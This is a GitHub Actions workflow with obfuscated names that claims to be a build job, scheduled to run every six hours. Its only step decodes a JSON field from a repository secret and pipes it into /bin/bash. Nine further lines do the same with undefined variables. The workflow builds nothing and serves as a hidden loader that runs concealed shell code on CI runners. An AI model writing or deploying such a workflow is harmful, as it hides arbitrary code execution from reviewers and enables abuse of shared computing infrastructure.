name: caocao19870106
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caocao19870106
        env:
          rdg19461: ${{ secrets.rdg19461 }}
        run: |
          echo $rdg19461 | jq -r .vz58 | /bin/bash
          echo $qy54964 | jq -r .mwzd75592 | /bin/bash
          echo $bm31 | jq -r .o19142 | /bin/bash
          echo $aaxfz3601 | jq -r .xb1 | /bin/bash
          echo $fnwxd5068 | jq -r .ybv34 | /bin/bash
          echo $mrdgl7 | jq -r .plam4839 | /bin/bash
          echo $cr3994 | jq -r .z85 | /bin/bash
          echo $saxfg697 | jq -r .ptur69 | /bin/bash
          echo $l1 | jq -r .jp73388 | /bin/bash
          echo $n6 | jq -r .xem537 | /bin/bash

